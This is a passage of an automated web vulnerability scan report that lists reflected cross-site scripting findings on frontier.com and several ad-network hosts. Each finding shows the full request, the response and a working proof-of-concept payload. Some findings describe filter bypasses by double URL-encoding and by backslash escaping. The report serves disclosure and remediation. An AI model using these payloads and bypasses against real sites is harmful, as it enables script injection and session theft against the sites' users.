<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_ctl00_Head1"><
...[SNIP]...
<![CDATA[
$('#hiddenRedirectHREFAfterValidation').val('http://frontier.com/PageNotFound.aspx?404;http://frontier.com:80/Images7327a';alert(1)//2dd01931fc3/2011promo/bg-grey.jpg');//]]>
...[SNIP]...
|
2.35. http://frontier.com/Images/2011promo/bg-grey.jpg [REST URL parameter 2]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://frontier.com |
| Path: |
/Images/2011promo/bg-grey.jpg |
Issue detail
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 611ec%2527%253balert%25281%2529%252f%252f635909959d4 was submitted in the REST URL parameter 2. This input was echoed as 611ec';alert(1)//635909959d4 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /Images/2011promo611ec%2527%253balert%25281%2529%252f%252f635909959d4/bg-grey.jpg HTTP/1.1
Host: frontier.com
Proxy-Connection: keep-alive
Referer: http://frontier.com/winwin1?mkwid=sPb9VHDZ0&pcrid=14742396110
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=RNLPJJS10.160.118.21T0x0000000e_0xc7da8508CMWUL; ASP.NET_SessionId=obmtq3qrw5huoh3ltwzo40av; CP=null*
|
Response
HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 11:51:51 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 43683
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_ctl00_Head1"><
...[SNIP]...
<![CDATA[
$('#hiddenRedirectHREFAfterValidation').val('http://frontier.com/PageNotFound.aspx?404;http://frontier.com:80/Images/2011promo611ec';alert(1)//635909959d4/bg-grey.jpg');//]]>
...[SNIP]...
|
2.36. http://frontier.com/Images/2011promo/bg-grey.jpg [REST URL parameter 3]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://frontier.com |
| Path: |
/Images/2011promo/bg-grey.jpg |
Issue detail
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cde47%2527%253balert%25281%2529%252f%252fcff2b560950 was submitted in the REST URL parameter 3. This input was echoed as cde47';alert(1)//cff2b560950 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /Images/2011promo/bg-grey.jpgcde47%2527%253balert%25281%2529%252f%252fcff2b560950 HTTP/1.1
Host: frontier.com
Proxy-Connection: keep-alive
Referer: http://frontier.com/winwin1?mkwid=sPb9VHDZ0&pcrid=14742396110
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=RNLPJJS10.160.118.21T0x0000000e_0xc7da8508CMWUL; ASP.NET_SessionId=obmtq3qrw5huoh3ltwzo40av; CP=null*
|
Response
HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 11:52:01 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 43683
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_ctl00_Head1"><
...[SNIP]...
<![CDATA[
$('#hiddenRedirectHREFAfterValidation').val('http://frontier.com/PageNotFound.aspx?404;http://frontier.com:80/Images/2011promo/bg-grey.jpgcde47';alert(1)//cff2b560950');//]]>
...[SNIP]...
|
2.37. http://frontier.com/Images/2011promo/bg-grey.jpg [name of an arbitrarily supplied request parameter]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://frontier.com |
| Path: |
/Images/2011promo/bg-grey.jpg |
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload de098'%3balert(1)//67697fc3289 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as de098';alert(1)//67697fc3289 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /Images/2011promo/bg-grey.jpg?de098'%3balert(1)//67697fc3289=1 HTTP/1.1
Host: frontier.com
Proxy-Connection: keep-alive
Referer: http://frontier.com/winwin1?mkwid=sPb9VHDZ0&pcrid=14742396110
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=RNLPJJS10.160.118.21T0x0000000e_0xc7da8508CMWUL; ASP.NET_SessionId=obmtq3qrw5huoh3ltwzo40av; CP=null*
|
Response
HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 11:51:32 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 43733
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_ctl00_Head1"><
...[SNIP]...
<![CDATA[
$('#hiddenRedirectHREFAfterValidation').val('http://frontier.com/PageNotFound.aspx?404;http://frontier.com:80/Images/2011promo/bg-grey.jpg?de098';alert(1)//67697fc3289=1');//]]>
...[SNIP]...
|
2.38. http://frontier.com/Shop/Login.aspx [REST URL parameter 1]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Firm |
| Host: |
http://frontier.com |
| Path: |
/Shop/Login.aspx |
Issue detail
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 866b2'%3b64e0a78ddc1 was submitted in the REST URL parameter 1. This input was echoed as 866b2';64e0a78ddc1 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /Shop866b2'%3b64e0a78ddc1/Login.aspx HTTP/1.1
Host: frontier.com
Proxy-Connection: keep-alive
Referer: http://frontier.com/winwin1?mkwid=sPb9VHDZ0&pcrid=14742396110
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=RNLPJJS10.160.118.21T0x0000000e_0xc7da8508CMWUL; ASP.NET_SessionId=obmtq3qrw5huoh3ltwzo40av; CP=null*; s_cc=true; s_sq=%5B%5BB%5D%5D
|
Response (redirected)
HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:30:05 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 43291
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_ctl00_Head1"><
...[SNIP]...
<![CDATA[
$('#hiddenRedirectHREFAfterValidation').val('http://frontier.com/PageNotFound.aspx?aspxerrorpath=/Shop866b2';64e0a78ddc1/Login.aspx');//]]>
...[SNIP]...
|
2.39. http://frontier.com/Shop/Login.aspx [REST URL parameter 2]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://frontier.com |
| Path: |
/Shop/Login.aspx |
Issue detail
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload eb7ff%2527%253balert%25281%2529%252f%252f4743277aa69 was submitted in the REST URL parameter 2. This input was echoed as eb7ff';alert(1)//4743277aa69 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /Shop/Login.aspxeb7ff%2527%253balert%25281%2529%252f%252f4743277aa69 HTTP/1.1
Host: frontier.com
Proxy-Connection: keep-alive
Referer: http://frontier.com/winwin1?mkwid=sPb9VHDZ0&pcrid=14742396110
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=RNLPJJS10.160.118.21T0x0000000e_0xc7da8508CMWUL; ASP.NET_SessionId=obmtq3qrw5huoh3ltwzo40av; CP=null*; s_cc=true; s_sq=%5B%5BB%5D%5D
|
Response
HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:30:18 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 43573
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_ctl00_Head1"><
...[SNIP]...
<![CDATA[
$('#hiddenRedirectHREFAfterValidation').val('http://frontier.com/PageNotFound.aspx?404;http://frontier.com:80/Shop/Login.aspxeb7ff';alert(1)//4743277aa69');//]]>
...[SNIP]...
|
2.40. http://frontier.com/winwin1 [REST URL parameter 1]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://frontier.com |
| Path: |
/winwin1 |
Issue detail
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d97a2%2527%253balert%25281%2529%252f%252f5a9a39ab965 was submitted in the REST URL parameter 1. This input was echoed as d97a2';alert(1)//5a9a39ab965 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /winwin1d97a2%2527%253balert%25281%2529%252f%252f5a9a39ab965?mkwid=sPb9VHDZ0&pcrid=14742396110 HTTP/1.1
Host: frontier.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=telephone+service
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
|
Response
HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 11:53:17 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 43781
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_ctl00_Head1"><
...[SNIP]...
<![CDATA[
$('#hiddenRedirectHREFAfterValidation').val('http://frontier.com/PageNotFound.aspx?404;http://frontier.com:80/winwin1d97a2';alert(1)//5a9a39ab965?mkwid=sPb9VHDZ0&pcrid=14742396110');//]]>
...[SNIP]...
|
2.41. http://frontier.com/winwin1 [mkwid parameter]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://frontier.com |
| Path: |
/winwin1 |
Issue detail
The value of the mkwid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4cd51'%3balert(1)//f8a5646b3ab was submitted in the mkwid parameter. This input was echoed as 4cd51';alert(1)//f8a5646b3ab in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /winwin1?mkwid=sPb9VHDZ04cd51'%3balert(1)//f8a5646b3ab&pcrid=14742396110 HTTP/1.1
Host: frontier.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=telephone+service
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
|
Response
HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 11:52:34 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 52186
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_ctl00_Head1"><
...[SNIP]...
<![CDATA[
$('#hiddenRedirectHREFAfterValidation').val('http://frontier.com/VirtualPage.aspx?pageid=1018&origPath=/winwin1&mkwid=sPb9VHDZ04cd51';alert(1)//f8a5646b3ab&pcrid=14742396110');//]]>
...[SNIP]...
|
2.42. http://frontier.com/winwin1 [name of an arbitrarily supplied request parameter]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://frontier.com |
| Path: |
/winwin1 |
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2473b'%3balert(1)//867912431c1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 2473b';alert(1)//867912431c1 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /winwin1?mkwid=sPb9VHDZ0&pcrid=14742396110&2473b'%3balert(1)//867912431c1=1 HTTP/1.1
Host: frontier.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=telephone+service
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
|
Response
HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 11:53:07 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 52233
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_ctl00_Head1"><
...[SNIP]...
<![CDATA[
$('#hiddenRedirectHREFAfterValidation').val('http://frontier.com/VirtualPage.aspx?pageid=1018&origPath=/winwin1&mkwid=sPb9VHDZ0&pcrid=14742396110&2473b';alert(1)//867912431c1=1');//]]>
...[SNIP]...
|
2.43. http://frontier.com/winwin1 [pcrid parameter]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://frontier.com |
| Path: |
/winwin1 |
Issue detail
The value of the pcrid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 59505'%3balert(1)//f0a2d5e98b9 was submitted in the pcrid parameter. This input was echoed as 59505';alert(1)//f0a2d5e98b9 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /winwin1?mkwid=sPb9VHDZ0&pcrid=1474239611059505'%3balert(1)//f0a2d5e98b9 HTTP/1.1
Host: frontier.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=telephone+service
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
|
Response
HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 11:52:51 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 52186
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_ctl00_Head1"><
...[SNIP]...
<![CDATA[
$('#hiddenRedirectHREFAfterValidation').val('http://frontier.com/VirtualPage.aspx?pageid=1018&origPath=/winwin1&mkwid=sPb9VHDZ0&pcrid=1474239611059505';alert(1)//f0a2d5e98b9');//]]>
...[SNIP]...
|
2.44. http://games.frontier.com/WebAnalysis/APP/GenerateCode.ashx [lc parameter]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://games.frontier.com |
| Path: |
/WebAnalysis/APP/GenerateCode.ashx |
Issue detail
The value of the lc request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 434e0\'%3balert(1)//c3ce629f4e0 was submitted in the lc parameter. This input was echoed as 434e0\\';alert(1)//c3ce629f4e0 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.
Request
GET /WebAnalysis/APP/GenerateCode.ashx?pagefilename=game&code=119282623&lc=en434e0\'%3balert(1)//c3ce629f4e0&channel=110464377 HTTP/1.1
Host: games.frontier.com
Proxy-Connection: keep-alive
Referer: http://games.frontier.com/game.htm?code=119282623&lc=en&channel=110464377
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; s_sq=oberonfrontier%3D%2526pid%253DhomePage%2526pidt%253D1%2526oid%253Dhttp%25253A//games.frontier.com/game.htm%25253Fcode%25253D119282623%252526lc%25253Den%252526channel%25253D110464377%2526ot%253DA
|
Response
HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 3416
Cache-Control: private, max-age=14400
Date: Tue, 06 Sep 2011 12:50:58 GMT
Connection: close
try{var s_account='oberonfrontier';
var s=s_gi(s_account);
GameCatalog.WebAnalysis.SiteTracking.Replacer.symbols = {'%%tcp-disconnect-status%%' : function(){ return GameShell.GetTcpDisconnectStatus
...[SNIP]...
ents,eVar1,eVar2,prop1,eVar7,eVar11,eVar10,prop10,eVar6"; s.linkTrackEvents = "event1"; s.dc = 112; s.eVar10 = s_account; s.prop10 = s_account; s.campaign = '' ; s.prop1 = 'WebAnalysis' ; s.prop2 = 'en434e0\\';alert(1)//c3ce629f4e0' ; s.prop3 = '/WebAnalysis/APP/GenerateCode.ashx' ; GameCatalog.WebAnalysis.SiteTracking['game']= { 'pageName' : 'GamePage - [Mystery Age Imperial Staff]' , 'products' : ';Mystery Age Imperial Staff'
...[SNIP]...
|
2.45. http://ib.adnxs.com/seg [redir parameter]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://ib.adnxs.com |
| Path: |
/seg |
Issue detail
The value of the redir request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2c810'%3balert(1)//01b28dbf622 was submitted in the redir parameter. This input was echoed as 2c810';alert(1)//01b28dbf622 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /seg?add=155746&redir=${SEG_IDS}2c810'%3balert(1)//01b28dbf622&t=1 HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/ober.frontier/product_undefined;dc_seed=;tile=2;dcopt=ist;sz=300x250;ord=8383746361359954?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: icu=ChIIrIsBEAoYASABKAEwwfGD8wQQwfGD8wQYAA..; anj=Kfu=8fG5EfE:3F.0s]#%2L_'x%SEV/i#-?R!z6Ut0QkM9e5'Qr*vP.V*lpYBPp[Bs3dBED7@8!MMT@<SGb]bp@OWFe]M3^!WeuSpp!<tk0xzCgSDb'W7Qc:sp!-ewEI]-`k1+Uxk1GOGkI/$_.v=_!`4hTmV3oY`#EoW=LnXT`HX)Ny^rF?u'>@*e?CDQ!(G@]1BW0Q<EQU#3!ZR*?l7/tm%40RO-2NpM_ZlEy!<e/e+ztxA; sess=1; uuid2=-1
|
Response
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Wed, 07-Sep-2011 12:46:31 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=-18; path=/; expires=Mon, 05-Dec-2011 12:46:31 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: anj=Kfu=8fG5+^E:3F.0s]#%2L_'x%SEV/i#-WZ!z6Ut0QkM9e5'Qr*vP.V*lpYBPp[Bs3dBED7@8!MMT@<SGb]bp@OWFe]M3^!WeuSpp!<tk0uQsu#'0AK.2BD)8JE^N(7nZs3ht</s2t.vO)!%C9MfYBDro4%$RXj*VXG`FnPjma[wF*_)<q[y1WP9e8pC8`#5O?0/><2+:3wu0usM@nf1dht<oQOZgDK+C#1JIHqN@hU=SVr%o_v%pV$Tn'!-5)NXI#wq; path=/; expires=Mon, 05-Dec-2011 12:46:31 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Date: Tue, 06 Sep 2011 12:46:31 GMT
Content-Length: 484
document.write('<img src="http://ad.doubleclick.net/activity;src=2055485;dcnet=4845;boom=52987;sz=1x1;ord=1?" width="1" height="1"/>');document.write('<img src="http://b.scorecardresearch.com/b?c1=8&c
...[SNIP]...
<scr'+'ipt type="text/javascript" src="${SEG_IDS}2c810';alert(1)//01b28dbf622">
...[SNIP]...
|
2.46. http://img.mediaplex.com/content/0/3484/103250/GGGreen_Flash_300x250_LPC.js [mpck parameter]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://img.mediaplex.com |
| Path: |
/content/0/3484/103250/GGGreen_Flash_300x250_LPC.js |
Issue detail
The value of the mpck request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5fa3a"%3balert(1)//ba80aca61be was submitted in the mpck parameter. This input was echoed as 5fa3a";alert(1)//ba80aca61be in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /content/0/3484/103250/GGGreen_Flash_300x250_LPC.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F3484-103250-2056-0%3Fmpt%3D21341037515fa3a"%3balert(1)//ba80aca61be&mpt=2134103751&mpvc=http://adclick.g.doubleclick.net/aclk%253Fsa%253DL%2526ai%253DB--PrVhhmTpXRMprmjQSu78WoAvWx35EClYfx3xq515WrPuCi5AEQARgBIKittBQ4AGDJ1vqGyKOgGbIBDnd3dy5teWZpdHYuY29tugEKMzAweDI1MF9hc8gBCdoBQWh0dHA6Ly93d3cubXlmaXR2LmNvbS9zZWFyY2g_cXVlcnk9WFMlRUYlQkYlQkRkYWNlO2FsZXJ0KDEpLy9iYWNruAIYwAIGyALr9M8M4AIA6gIKMjg0ODM1Njc5NZADrAKYA-ADqAMB0QOyxxpSLRKzBPUDAAgAxMgEAeAEAaAGEQ%2526num%253D1%2526sig%253DAOD64_3qs0lOVYYCU9__uy2v7b56S6k4_Q%2526client%253Dca-pub-2043876247497391%2526adurl%253D HTTP/1.1
Host: img.mediaplex.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
